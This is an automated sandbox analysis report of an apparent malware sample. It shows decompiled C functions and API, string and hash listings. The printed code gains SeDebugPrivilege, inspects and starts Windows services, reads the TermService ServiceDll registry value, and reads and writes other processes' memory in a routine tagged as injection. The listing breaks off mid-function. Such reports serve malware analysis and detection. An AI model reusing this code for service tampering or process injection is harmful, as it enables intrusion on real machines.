				_t10 = OpenSCManagerW(0, L"ServicesActive", 1);
				_t37 = _t10;
				if(_t37 != 0) {
					_t26 = OpenServiceW(_t37,  *_a4, 1);
					if(_t26 != 0) {
						if(QueryServiceConfigW(_t26, 0, 0,  &_v8) != 0 || GetLastError() == 0x7a) {
							_t34 = E00406045(_v8);
							_a4 = _t34;
							if(QueryServiceConfigW(_t26, _t34, _v8,  &_v8) != 0) {
								CloseServiceHandle(_t37);
								CloseServiceHandle(_t26);
								E00401099(_a4);
								_t10 =  *(_t34 + 4);
							} else {
								goto L6;
							}
						} else {
							L6:
							CloseServiceHandle(_t37);
							CloseServiceHandle(_t26);
							goto L7;
						}
					} else {
						CloseServiceHandle(_t37);
						L7:
						_t10 = 0;
					}
				}
				return _t10;
			}









                                  0x0040d43d
                                  0x0040d440
                                  0x0040d446
                                  0x0040d44a
                                  0x0040d45f
                                  0x0040d463
                                  0x0040d47d
                                  0x0040d492
                                  0x0040d49b
                                  0x0040d4a8
                                  0x0040d4c4
                                  0x0040d4c7
                                  0x0040d4cc
                                  0x0040d4d2
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x0040d4aa
                                  0x0040d4aa
                                  0x0040d4b1
                                  0x0040d4b4
                                  0x00000000
                                  0x0040d4b4
                                  0x0040d465
                                  0x0040d466
                                  0x0040d4b6
                                  0x0040d4b6
                                  0x0040d4b6
                                  0x0040d4d4
                                  0x0040d4d8

                                  APIs
                                  • OpenSCManagerW.ADVAPI32(00000000,ServicesActive,00000001), ref: 0040D440
                                  • OpenServiceW.ADVAPI32(00000000,?,00000001), ref: 0040D459
                                  • CloseServiceHandle.ADVAPI32(00000000), ref: 0040D466
                                  • QueryServiceConfigW.ADVAPI32(00000000,00000000,00000000,?), ref: 0040D475
                                  • GetLastError.KERNEL32 ref: 0040D47F
                                  • QueryServiceConfigW.ADVAPI32(00000000,00000000,?,?), ref: 0040D4A0
                                  • CloseServiceHandle.ADVAPI32(00000000), ref: 0040D4B1
                                  • CloseServiceHandle.ADVAPI32(00000000), ref: 0040D4B4
                                  • CloseServiceHandle.ADVAPI32(00000000), ref: 0040D4C4
                                  • CloseServiceHandle.ADVAPI32(00000000), ref: 0040D4C7
                                    • Part of subcall function 00401099: GetProcessHeap.KERNEL32(00000000,00000000,00413499,00000000,00000000,00000000,00000000,.bss,00000000), ref: 0040109F
                                    • Part of subcall function 00401099: HeapFree.KERNEL32(00000000), ref: 004010A6
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.2119927907.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: Service$CloseHandle$ConfigHeapOpenQuery$ErrorFreeLastManagerProcess
                                  • String ID: ServicesActive
                                  • API String ID: 1929760286-3071072050
                                  • Opcode ID: cd1e18646101d5c1bab72bb6f7b1f33bedb6a16cea768a9159eaaec8da9406aa
                                  • Instruction ID: 77105f180dc1f4f583609010b4a2cd32bd7f1b8692fb86ee244d35c389544786
                                  • Opcode Fuzzy Hash: cd1e18646101d5c1bab72bb6f7b1f33bedb6a16cea768a9159eaaec8da9406aa
                                  • Instruction Fuzzy Hash: B2119071904218BBC7119BB2DC49DDF3FBDEF853607118176F902E2250DB78AE04CAA8
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0040DD72, Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 324COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 84%
                                  			E0040DD72(struct _CRITICAL_SECTION* __ecx, void* __edx) {
				char _v28;
				char _v32;
				char _v36;
				char _v52;
				char _v60;
				char _v68;
				char _v76;
				signed int _v80;
				char _v84;
				char _v88;
				char _v92;
				signed int _v96;
				signed int _v100;
				intOrPtr _v104;
				char _v108;
				signed int _v112;
				signed int _v116;
				int _t102;
				int _t103;
				int _t106;
				int _t107;
				void* _t109;
				void* _t110;
				int _t111;
				int _t113;
				int _t114;
				int _t120;
				void* _t121;
				int _t159;
				void* _t172;
				int _t181;
				int _t182;
				signed int _t203;
				char* _t233;
				intOrPtr _t244;
				void* _t248;
				char* _t251;
				void* _t264;
				struct _CRITICAL_SECTION* _t267;
				signed int _t276;
				signed int _t278;
				signed int _t279;
				void* _t281;

				_t264 = __edx;
				_t205 = __ecx;
				_t281 = (_t279 & 0xfffffff8) - 0x5c;
				_t267 = __ecx;
				_t203 = 0;
				_v84 = 0;
				_v80 = 0;
				_v96 = 0;
				EnterCriticalSection(__ecx);
				if(E00411177(_t205) == 1) {
					_t205 =  &_v96;
					E00410CFF( &_v96);
				}
				_t270 = _t267 + 0x38;
				_t102 = PathFileExistsW( *(_t267 + 0x38));
				_t283 = _t102;
				if(_t102 != 0) {
					L14:
					_t271 = _t267 + 0x3c;
					_t103 = PathFileExistsW( *(_t267 + 0x3c));
					__eflags = _t103;
					if(_t103 != 0) {
						L20:
						E0040DB52(_t267, _t264);
						E0040DB39(_t267);
						_t208 = _t267;
						_t106 = E0040D8FB(_t267);
						__eflags = _t106;
						if(_t106 != 0) {
							_t209 = _t267;
							_t107 = E0040D856(_t267, _t264, _t208);
							__eflags = _t107;
							if(_t107 != 0) {
								E0040DAD6(_t209);
								_t109 = E004036F7( &_v92, L"SeDebugPrivilege");
								_t110 = GetCurrentProcess();
								_t265 = _t109;
								_t111 = E00410B38(_t110, _t109);
								E00405FEB(_v96);
								__eflags = _t111;
								if(_t111 != 0) {
									_t213 =  *(_t267 + 0x2c);
									_t113 = E0041229C( *(_t267 + 0x2c));
									__eflags = _t113;
									if(_t113 != 0) {
										Sleep(0x3e8);
										_t114 =  *(_t267 + 0x4c);
										__eflags = _t114;
										if(_t114 != 0) {
											_t276 = _t203;
											__eflags = _t276 - _t114;
											do {
												E00405DE9(_t213 & 0xffffff00 | __eflags > 0x00000000);
												E0040373F( &_v92,  *((intOrPtr*)(_t267 + 0x44)) + _t276 * 4);
												E0040D3A8( &_v96);
												_t213 = _v100;
												E00405FEB(_v100);
												_t276 = _t276 + 1;
												_v100 = _t203;
												__eflags = _t276 -  *(_t267 + 0x4c);
											} while (_t276 <  *(_t267 + 0x4c));
										}
										Sleep(0x1f4);
										E0040373F( &_v92, _t267 + 0x28);
										E0040D3A8( &_v96);
										_t215 = _v100;
										E00405FEB(_v100);
										Sleep(0x1f4);
										_t120 = E0040D4DB(_t265, __eflags, _v100);
										__eflags = _t120;
										if(_t120 != 0) {
											_t121 = E00411177(_t215);
											__eflags = _t121 - 1;
											if(_t121 == 1) {
												E00410CD8(_v96);
											}
											E00405044( *((intOrPtr*)(_t267 + 0x64)), E00404C5E( &_v68, _t203, _t267 + 0x5c, _t267 + 0x60));
											E00404C3B( &_v84);
											LeaveCriticalSection(_t267);
											_t203 = 8;
										} else {
											_push(_t267 + 0x60);
											_push(_t267 + 0x5c);
											_push(7);
											goto L34;
										}
									} else {
										E00410CD8(_v96);
										_push(_t267 + 0x60);
										_push(_t267 + 0x5c);
										_push(5);
										goto L34;
									}
								} else {
									E00410CD8(_v96);
									_push(_t267 + 0x60);
									_push(_t267 + 0x5c);
									_push(3);
									goto L34;
								}
							} else {
								E00410CD8(_v96);
								_push(_t267 + 0x60);
								_push(_t267 + 0x5c);
								_push(6);
								goto L34;
							}
						} else {
							E00410CD8(_v96);
							_push(_t267 + 0x60);
							_push(_t267 + 0x5c);
							_push(4);
							L34:
							E00405044( *((intOrPtr*)(_t267 + 0x64)), E00404C5E( &_v68));
							E00404C3B( &_v84);
							LeaveCriticalSection(_t267);
						}
					} else {
						E0040373F(_t281, _t271);
						E00411722( &_v32, __eflags, _t205, _t203);
						_t232 =  *((intOrPtr*)(_t267 + 0x58));
						E00415847( *((intOrPtr*)(_t267 + 0x58)), _t264,  &_v88,  *((intOrPtr*)(_t267 + 0x64)), 3);
						__eflags = _v100 - _t203;
						if(_v100 != _t203) {
							_t233 =  &_v28;
							_t159 = E0041130F(_t233, _t232, _t232);
							__eflags = _t159;
							if(_t159 != 0) {
								_push(_t233);
								E0041165C( &_v28,  &_v76);
								E00411644( &_v36);
							}
							E00403148( &_v76);
							E0041140C( &_v28, __eflags);
							goto L20;
						} else {
							E00403148( &_v76);
							goto L8;
						}
					}
				} else {
					E0040373F(_t281, _t270);
					E00411722( &_v32, _t283, _t205, _t203);
					E0040373F(_t281, _t267 + 0x40);
					E00411722( &_v68, _t283,  &_v32, _t203);
					_v116 = _t203;
					_v112 = _t203;
					_v100 = _t203;
					_v96 = _t203;
					_t172 = E00411177( &_v68);
					_t244 =  *((intOrPtr*)(_t267 + 0x58));
					if(_t172 != 1) {
						E00402FCE( &_v96, E00415847(_t244, _t264,  &_v92,  *((intOrPtr*)(_t267 + 0x64)), 1));
						E00403148( &_v84);
						_t278 = _v100;
						E004030CC( &_v108, _t278, 0x12e00);
						_t248 = _t278 + 0x12e00;
						_t179 = _v104 + 0xfffed200;
						__eflags = _v104 + 0xfffed200;
					} else {
						E00402FCE( &_v96, E00415847(_t244, _t264,  &_v92,  *((intOrPtr*)(_t267 + 0x64)), 2));
						E00403148( &_v84);
						_t278 = _v100;
						E004030CC( &_v108, _t278, 0x1c800);
						_t248 = _t278 + 0x1c800;
						_t179 = _v104 + 0xfffe3800;
					}
					E004030CC( &_v76, _t248, _t179);
					_t285 = _t278;
					if(_t278 != 0) {
						_t250 =  &_v28;
						_t181 = E0041130F(_t250,  &_v76,  &_v76);
						__eflags = _t181;
						if(_t181 != 0) {
							_push(_t250);
							E0041165C( &_v28,  &_v92);
							_t250 =  &_v36;
							E00411644( &_v36);
						}
						_t251 =  &_v52;
						_t182 = E0041130F(_t251, _t250, _t250);
						__eflags = _t182;
						if(_t182 != 0) {
							_push(_t251);
							E0041165C( &_v52,  &_v76);
							E00411644( &_v60);
						}
						E00403148( &_v76);
						E00403148( &_v92);
						E0041140C( &_v52, __eflags);
						_t205 =  &_v28;
						E0041140C( &_v28, __eflags);
						goto L14;
					} else {
						E00403148( &_v76);
						E00403148( &_v92);
						E0041140C( &_v52, _t285);
						L8:
						E0041140C( &_v28, _t285);
						_t203 = _t203 | 0xffffffff;
					}
				}
				E00403148( &_v84);
				return _t203;
			}














































                                  0x0040dd72
                                  0x0040dd72
                                  0x0040dd78
                                  0x0040dd7e
                                  0x0040dd80
                                  0x0040dd83
                                  0x0040dd87
                                  0x0040dd8b
                                  0x0040dd8f
                                  0x0040dd9d
                                  0x0040dd9f
                                  0x0040dda3
                                  0x0040dda3
                                  0x0040dda8
                                  0x0040ddad
                                  0x0040ddb3
                                  0x0040ddb5
                                  0x0040df34
                                  0x0040df34
                                  0x0040df39
                                  0x0040df3f
                                  0x0040df41
                                  0x0040dfb5
                                  0x0040dfb7
                                  0x0040dfbe
                                  0x0040dfc3
                                  0x0040dfc5
                                  0x0040dfca
                                  0x0040dfcc
                                  0x0040dfe7
                                  0x0040dfe9
                                  0x0040dfee
                                  0x0040dff0
                                  0x0040e00a
                                  0x0040e018
                                  0x0040e01f
                                  0x0040e025
                                  0x0040e029
                                  0x0040e034
                                  0x0040e039
                                  0x0040e03b
                                  0x0040e055
                                  0x0040e058
                                  0x0040e05d
                                  0x0040e05f
                                  0x0040e084
                                  0x0040e086
                                  0x0040e089
                                  0x0040e08b
                                  0x0040e08d
                                  0x0040e08f
                                  0x0040e091
                                  0x0040e094
                                  0x0040e0a4
                                  0x0040e0ae
                                  0x0040e0b3
                                  0x0040e0b7
                                  0x0040e0bf
                                  0x0040e0c0
                                  0x0040e0c4
                                  0x0040e0c4
                                  0x0040e0c8
                                  0x0040e0d3
                                  0x0040e0dd
                                  0x0040e0e7
                                  0x0040e0ec
                                  0x0040e0f0
                                  0x0040e0fa
                                  0x0040e0fd
                                  0x0040e102
                                  0x0040e104
                                  0x0040e134
                                  0x0040e139
                                  0x0040e13c
                                  0x0040e142
                                  0x0040e142
                                  0x0040e15d
                                  0x0040e166
                                  0x0040e16c
                                  0x0040e174
                                  0x0040e106
                                  0x0040e109
                                  0x0040e10d
                                  0x0040e10e
                                  0x00000000
                                  0x0040e10e
                                  0x0040e061
                                  0x0040e065
                                  0x0040e06d
                                  0x0040e071
                                  0x0040e072
                                  0x00000000
                                  0x0040e072
                                  0x0040e03d
                                  0x0040e041
                                  0x0040e049
                                  0x0040e04d
                                  0x0040e04e
                                  0x00000000
                                  0x0040e04e
                                  0x0040dff2
                                  0x0040dff6
                                  0x0040dffe
                                  0x0040e002
                                  0x0040e003
                                  0x00000000
                                  0x0040e003
                                  0x0040dfce
                                  0x0040dfd2
                                  0x0040dfda
                                  0x0040dfde
                                  0x0040dfdf
                                  0x0040e110
                                  0x0040e11d
                                  0x0040e126
                                  0x0040e12c
                                  0x0040e12c
                                  0x0040df43
                                  0x0040df48
                                  0x0040df51
                                  0x0040df56
                                  0x0040df63
                                  0x0040df68
                                  0x0040df6c
                                  0x0040df7e
                                  0x0040df82
                                  0x0040df87
                                  0x0040df89
                                  0x0040df8b
                                  0x0040df95
                                  0x0040df9e
                                  0x0040df9e
                                  0x0040dfa7
                                  0x0040dfb0
                                  0x00000000
                                  0x0040df6e
                                  0x0040df72
                                  0x00000000
                                  0x0040df72
                                  0x0040df6c
                                  0x0040ddbb
                                  0x0040ddc0
                                  0x0040ddc9
                                  0x0040ddd6
                                  0x0040dddf
                                  0x0040dde4
                                  0x0040dde8
                                  0x0040ddec
                                  0x0040ddf0
                                  0x0040ddf4
                                  0x0040ddf9
                                  0x0040de03
                                  0x0040de57
                                  0x0040de60
                                  0x0040de65
                                  0x0040de73
                                  0x0040de7c
                                  0x0040de82
                                  0x0040de82
                                  0x0040de05
                                  0x0040de15
                                  0x0040de1e
                                  0x0040de23
                                  0x0040de31
                                  0x0040de3a
                                  0x0040de40
                                  0x0040de40
                                  0x0040de8d
                                  0x0040de92
                                  0x0040de94
                                  0x0040dec4
                                  0x0040dec8
                                  0x0040decd
                                  0x0040decf
                                  0x0040ded1
                                  0x0040dedb
                                  0x0040dee0
                                  0x0040dee4
                                  0x0040dee4
                                  0x0040deeb
                                  0x0040deef
                                  0x0040def4
                                  0x0040def6
                                  0x0040def8
                                  0x0040df02
                                  0x0040df0b
                                  0x0040df0b
                                  0x0040df14
                                  0x0040df1d
                                  0x0040df26
                                  0x0040df2b
                                  0x0040df2f
                                  0x00000000
                                  0x0040de96
                                  0x0040de9a
                                  0x0040dea3
                                  0x0040deac
                                  0x0040deb1
                                  0x0040deb5
                                  0x0040deba
                                  0x0040deba
                                  0x0040de94
                                  0x0040e179
                                  0x0040e186

                                  APIs
                                  • EnterCriticalSection.KERNEL32 ref: 0040DD8F
                                    • Part of subcall function 00411177: GetCurrentProcess.KERNEL32(?,?,00402EBF,?,00417668,?,?,00000000,?,?,?), ref: 0041117B
                                  • PathFileExistsW.SHLWAPI(?), ref: 0040DF39
                                  • PathFileExistsW.SHLWAPI(?), ref: 0040DDAD
                                    • Part of subcall function 0041130F: CreateFileW.KERNEL32(?,C0000000,00000001,00000000,00000001,00000000,00000000), ref: 00411326
                                    • Part of subcall function 0041130F: GetLastError.KERNEL32(?,?,?,004091CE,?,?,?), ref: 00411334
                                  • LeaveCriticalSection.KERNEL32(?,00000000), ref: 0040E12C
                                    • Part of subcall function 0040D856: RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000102,?,SYSTEM\CurrentControlSet\Services\TermService\Parameters), ref: 0040D88A
                                  • GetCurrentProcess.KERNEL32(SeDebugPrivilege), ref: 0040E01F
                                  • LeaveCriticalSection.KERNEL32(?,00000000), ref: 0040E16C
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.2119927907.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: CriticalFileSection$CurrentExistsLeavePathProcess$CreateEnterErrorLastOpen
                                  • String ID: SeDebugPrivilege
                                  • API String ID: 1717069549-2896544425
                                  • Opcode ID: 7a5596d6f9b17c3493d3e3706fd43e1eb96af3e8f0f7be516742428879ee00f0
                                  • Instruction ID: 55d7e5f8d1f4b9ec0964da3279b74dcd5ea268b2ca2f52e34cb3dca68faebe82
                                  • Opcode Fuzzy Hash: 7a5596d6f9b17c3493d3e3706fd43e1eb96af3e8f0f7be516742428879ee00f0
                                  • Instruction Fuzzy Hash: D0B13171504245ABC304EF62CC919EFB7A8BF54348F40093EF552A71D1EB78EA49CB9A
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0040DB52, Relevance: 17.6, APIs: 4, Strings: 6, Instructions: 111registryCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E0040DB52(void* __ecx, void* __edx) {
				void* _v8;
				WCHAR* _v12;
				signed int _v16;
				short* _v20;
				short* _v24;
				char _v28;
				int _v32;
				char _v36;
				void* _t50;
				void* _t62;
				void* _t72;
				void* _t96;

				_t96 = __edx;
				_t72 = __ecx;
				_v8 = 0;
				E004036F7( &_v24, L"SYSTEM\\CurrentControlSet\\Services\\TermService");
				E004036F7( &_v20, L"SYSTEM\\CurrentControlSet\\Services\\TermService\\Parameters");
				_v36 = 0;
				_v32 = 0;
				if(RegOpenKeyExW(0x80000002, _v24, 0, 0x20119,  &_v8) == 0) {
					_t50 = E00412569(_t96, E004036F7( &_v16, L"ImagePath"),  &_v36);
					E00405FEB(_v16);
					E00412554( &_v8);
					if(_t50 != 0) {
						E0040300A( &_v36,  &_v12);
						E004030FE( &_v36);
						if(StrStrW(_v12, L"svchost.exe") != 0 || StrStrW(_v12, L"svchost.exe -k") != 0) {
							if(RegOpenKeyExW(0x80000002, _v20, 0, 0x20119,  &_v8) == 0) {
								_t62 = E00412569(_t96, E004036F7( &_v16, L"ServiceDll"),  &_v36);
								E00405FEB(_v16);
								_t107 = _t62;
								if(_t62 != 0) {
									E00403549(_t72 + 0x20, E004032E6( &_v16, E0040300A( &_v36,  &_v28), _t107));
									E00405FEB(_v16);
									_v16 = _v16 & 0x00000000;
									E00405FEB(_v28);
								}
								E00412554( &_v8);
							}
						}
						E00405FEB(_v12);
						_v12 = _v12 & 0x00000000;
					}
				}
				E00403148( &_v36);
				E00405FEB(_v20);
				E00405FEB(_v24);
				return E00412554( &_v8);
			}















                                  0x0040db52
                                  0x0040db5a
                                  0x0040db66
                                  0x0040db69
                                  0x0040db76
                                  0x0040db7e
                                  0x0040db8b
                                  0x0040db9b
                                  0x0040dbb6
                                  0x0040dbc0
                                  0x0040dbc8
                                  0x0040dbcf
                                  0x0040dbdc
                                  0x0040dbe4
                                  0x0040dbfb
                                  0x0040dc2a
                                  0x0040dc41
                                  0x0040dc4b
                                  0x0040dc50
                                  0x0040dc52
                                  0x0040dc6e
                                  0x0040dc76
                                  0x0040dc7e
                                  0x0040dc82
                                  0x0040dc82
                                  0x0040dc8a
                                  0x0040dc8a
                                  0x0040dc2a
                                  0x0040dc92
                                  0x0040dc97
                                  0x0040dc97
                                  0x0040dbcf
                                  0x0040dc9e
                                  0x0040dca6
                                  0x0040dcae
                                  0x0040dcbe

                                  APIs
                                    • Part of subcall function 004036F7: lstrlenW.KERNEL32(00413483,00000000,?,00413483,00000000,00000000,.bss,00000000), ref: 00403700
                                    • Part of subcall function 004036F7: lstrlenW.KERNEL32(00413483,?,00413483,00000000,00000000,.bss,00000000), ref: 00403717
                                    • Part of subcall function 004036F7: lstrcpyW.KERNEL32(?,00413483), ref: 00403732
                                  • RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00020119,?,SYSTEM\CurrentControlSet\Services\TermService\Parameters,SYSTEM\CurrentControlSet\Services\TermService), ref: 0040DB93
                                    • Part of subcall function 00412569: RegQueryValueExW.ADVAPI32(?,74A313FB,00000000,74A313FB,00000000,00000000,?,00000000,?VA,?,?,?,00412B8B,?,?,80000001), ref: 0041258C
                                    • Part of subcall function 00412569: RegQueryValueExW.ADVAPI32(?,74A313FB,00000000,74A313FB,00000000,00000000,?,00412B8B,?,?,80000001,?,000F003F,00000000,00000000,Software\Microsoft\Windows NT\CurrentVersion\Windows), ref: 004125B0
                                    • Part of subcall function 00405FEB: VirtualFree.KERNELBASE(?,00000000,00008000,00405D70,00000000,?,00412694,?,?,0041577A), ref: 00405FF3
                                    • Part of subcall function 00412554: RegCloseKey.ADVAPI32(?,?,004126D3,?,?,0041577A), ref: 0041255E
                                  • StrStrW.SHLWAPI(?,svchost.exe), ref: 0040DBF7
                                  • StrStrW.SHLWAPI(?,svchost.exe -k), ref: 0040DC05
                                  • RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00020119,?), ref: 0040DC22
                                  Strings
                                  • SYSTEM\CurrentControlSet\Services\TermService, xrefs: 0040DB5E
                                  • ImagePath, xrefs: 0040DBA5
                                  • svchost.exe, xrefs: 0040DBEF
                                  • ServiceDll, xrefs: 0040DC30
                                  • SYSTEM\CurrentControlSet\Services\TermService\Parameters, xrefs: 0040DB6E
                                  • svchost.exe -k, xrefs: 0040DBFD
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.2119927907.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: OpenQueryValuelstrlen$CloseFreeVirtuallstrcpy
                                  • String ID: ImagePath$SYSTEM\CurrentControlSet\Services\TermService$SYSTEM\CurrentControlSet\Services\TermService\Parameters$ServiceDll$svchost.exe$svchost.exe -k
                                  • API String ID: 2246401353-3333427388
                                  • Opcode ID: e62b033c753448ef77cd55ec4bf4ec78d5aac30aa8340905b37c8a1f5274b33c
                                  • Instruction ID: 0a0d703e0c22a180c861e42df2812f13597edfba14798331e50e127ee1e54c95
                                  • Opcode Fuzzy Hash: e62b033c753448ef77cd55ec4bf4ec78d5aac30aa8340905b37c8a1f5274b33c
                                  • Instruction Fuzzy Hash: 4C41E631D00119ABDB15EBA2CD92EEEBB79AF14748F50006AF801B21D1EB785F45CA68
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0040D3A8, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 55servicesleepCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E0040D3A8(short** _a4) {
				void* _t2;
				int _t8;
				void* _t13;
				int _t15;
				void* _t17;

				_t15 = 0;
				_t2 = OpenSCManagerW(0, L"ServicesActive", 1);
				_t17 = _t2;
				if(_t17 != 0) {
					_t13 = OpenServiceW(_t17,  *_a4, 0x10);
					if(_t13 != 0) {
						if(StartServiceW(_t13, 0, 0) != 0) {
							L6:
							_t15 = 1;
							L7:
							CloseServiceHandle(_t17);
							CloseServiceHandle(_t13);
							_t8 = _t15;
							L8:
							return _t8;
						}
						if(GetLastError() != 0x420) {
							goto L7;
						}
						Sleep(0x7d0);
						if(StartServiceW(_t13, 0, 0) == 0) {
							goto L7;
						}
						goto L6;
					}
					CloseServiceHandle(_t17);
					_t8 = 0;
					goto L8;
				}
				return _t2;
			}








                                  0x0040d3b4
                                  0x0040d3b7
                                  0x0040d3bd
                                  0x0040d3c1
                                  0x0040d3d2
                                  0x0040d3d6
                                  0x0040d3ee
                                  0x0040d415
                                  0x0040d417
                                  0x0040d418
                                  0x0040d41f
                                  0x0040d422
                                  0x0040d424
                                  0x0040d426
                                  0x00000000
                                  0x0040d426
                                  0x0040d3fb
                                  0x00000000
                                  0x00000000
                                  0x0040d402
                                  0x0040d413
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x0040d413
                                  0x0040d3d9
                                  0x0040d3df
                                  0x00000000
                                  0x0040d3df
                                  0x0040d42a

                                  APIs
                                  • OpenSCManagerW.ADVAPI32(00000000,ServicesActive,00000001), ref: 0040D3B7
                                  • OpenServiceW.ADVAPI32(00000000,?,00000010), ref: 0040D3CC
                                  • CloseServiceHandle.ADVAPI32(00000000), ref: 0040D3D9
                                  • StartServiceW.ADVAPI32(00000000,00000000,00000000), ref: 0040D3E6
                                  • GetLastError.KERNEL32 ref: 0040D3F0
                                  • Sleep.KERNEL32(000007D0), ref: 0040D402
                                  • StartServiceW.ADVAPI32(00000000,00000000,00000000), ref: 0040D40B
                                  • CloseServiceHandle.ADVAPI32(00000000), ref: 0040D41F
                                  • CloseServiceHandle.ADVAPI32(00000000), ref: 0040D422
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.2119927907.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: Service$CloseHandle$OpenStart$ErrorLastManagerSleep
                                  • String ID: ServicesActive
                                  • API String ID: 104619213-3071072050
                                  • Opcode ID: 3cebff5e58f89dfa7b23d4f060edef8f4579dac96d3e42af9f8a36863e90b399
                                  • Instruction ID: 984c0b14d8c5f8436b4892bcd3ae393994a7e81e733ff7ebf7d643affbd23cba
                                  • Opcode Fuzzy Hash: 3cebff5e58f89dfa7b23d4f060edef8f4579dac96d3e42af9f8a36863e90b399
                                  • Instruction Fuzzy Hash: 87014F35B083657BD6211BB6AC8CE9B3E7DDBC9B51B014076FA05E2290CA78980586B9
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00410D2D, Relevance: 15.9, APIs: 4, Strings: 5, Instructions: 130comCOMMON
                                  Download Yara Rule
                                  APIs
                                  • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 00410D44
                                  • CoInitialize.OLE32(00000000), ref: 00410D4B
                                  • CoCreateInstance.OLE32(004174B0,00000000,00000017,00419CC8,?), ref: 00410D69
                                  • VariantInit.OLEAUT32(?), ref: 00410DED
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.2119927907.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: Initialize$CreateInitInstanceSecurityVariant
                                  • String ID: G.@$Name$SELECT Name FROM Win32_VideoController$WQL$root\CIMV2
                                  • API String ID: 2382742315-1265846757
                                  • Opcode ID: 6216df57731d72d57e541994fb23270ea6e499dffcfc2a0be6aacaaebdd8d353
                                  • Instruction ID: 842cc41d95007274ba15a25a83f44bddffeff0cfe444bad9149d26d573bd0b7d
                                  • Opcode Fuzzy Hash: 6216df57731d72d57e541994fb23270ea6e499dffcfc2a0be6aacaaebdd8d353
                                  • Instruction Fuzzy Hash: B141FB70A00209BFCB10DB96CC48EDFBBBDEFC9B14B104459F515EB290D6B5A981CB64
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0040EE24, Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 126filememoryinjectionCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E0040EE24(long* __ecx, void** __edx, long _a4) {
				long _v8;
				intOrPtr _v12;
				LONG* _v16;
				void* _t30;
				void _t32;
				void* _t35;
				int _t37;
				void* _t44;
				void* _t46;
				void* _t52;
				long _t62;
				void* _t63;
				struct _OVERLAPPED* _t74;

				_t60 = __ecx;
				_v12 = 0x426970;
				_t74 = 0;
				_v16 = 0;
				_t62 = __ecx[1];
				_t72 = __edx;
				_t30 =  *_t62;
				if(_t30 == 0) {
					_t63 = __edx[1];
					_t32 =  *_t63;
					if(_t32 == 0) {
						E0040102C( *__ecx,  *__edx, _a4);
						_t74 = 1;
						L22:
						return _t74;
					}
					_t35 = _t32 - 1;
					if(_t35 == 0) {
						_t37 = ReadProcessMemory( *( *(_t63 + 4)),  *__edx,  *__ecx, _a4, 0);
						L8:
						_t74 = _t37;
						goto L22;
					}
					if(_t35 != 5 || SetFilePointer( *( *(_t63 + 4)),  *__edx, 0, 0) == 0xffffffff) {
						goto L22;
					} else {
						_t37 = ReadFile( *( *(_t72[1] + 4)),  *_t60, _a4,  &_v8, 0);
						goto L8;
					}
				}
				_t44 = _t30 - 1;
				if(_t44 == 0) {
					if( *(__edx[1]) != 0) {
						L11:
						_t46 = LocalAlloc(0x40, _a4);
						_v16 = _t46;
						if(_t46 != 0) {
							if(E0040EE24( &_v16, _t72, _a4) != 0) {
								_t74 = E0040EE24(_t60,  &_v16, _a4);
							}
							LocalFree(_v16);
						}
						goto L22;
					}
					_t37 = WriteProcessMemory( *( *(_t62 + 4)),  *__ecx,  *__edx, _a4, 0);
					goto L8;
				}
				_t52 = _t44;
				if(_t52 == 0) {
					goto L11;
				}
				if(_t52 != 3) {
					goto L22;
				}
				if( *(__edx[1]) != 0) {
					goto L11;
				}
				if( *__ecx == 0 || SetFilePointer( *( *(_t62 + 4)),  *__ecx, 0, 0) != 0) {
					_t37 = WriteFile( *( *(_t60[1] + 4)),  *_t72, _a4,  &_v8, _t74);
					goto L8;
				} else {
					goto L22;
				}
			}
















                                  0x0040ee2b
                                  0x0040ee2d
                                  0x0040ee35
                                  0x0040ee37
                                  0x0040ee3a
                                  0x0040ee3e
                                  0x0040ee42
                                  0x0040ee44
                                  0x0040eefe
                                  0x0040ef03
                                  0x0040ef05
                                  0x0040ef61
                                  0x0040ef6b
                                  0x0040ef6c
                                  0x0040ef72
                                  0x0040ef72
                                  0x0040ef07
                                  0x0040ef0a
                                  0x0040ef4f
                                  0x0040ee98
                                  0x0040ee98
                                  0x00000000
                                  0x0040ee98
                                  0x0040ef0f
                                  0x00000000
                                  0x0040ef25
                                  0x0040ef37
                                  0x00000000
                                  0x0040ef37
                                  0x0040ef0f
                                  0x0040ee4a
                                  0x0040ee4d
                                  0x0040eea4
                                  0x0040eebb
                                  0x0040eec0
                                  0x0040eec6
                                  0x0040eecb
                                  0x0040eee1
                                  0x0040eef1
                                  0x0040eef1
                                  0x0040eef6
                                  0x0040eef6
                                  0x00000000
                                  0x0040eecb
                                  0x0040eeb3
                                  0x00000000
                                  0x0040eeb3
                                  0x0040ee50
                                  0x0040ee53
                                  0x00000000
                                  0x00000000
                                  0x0040ee58
                                  0x00000000
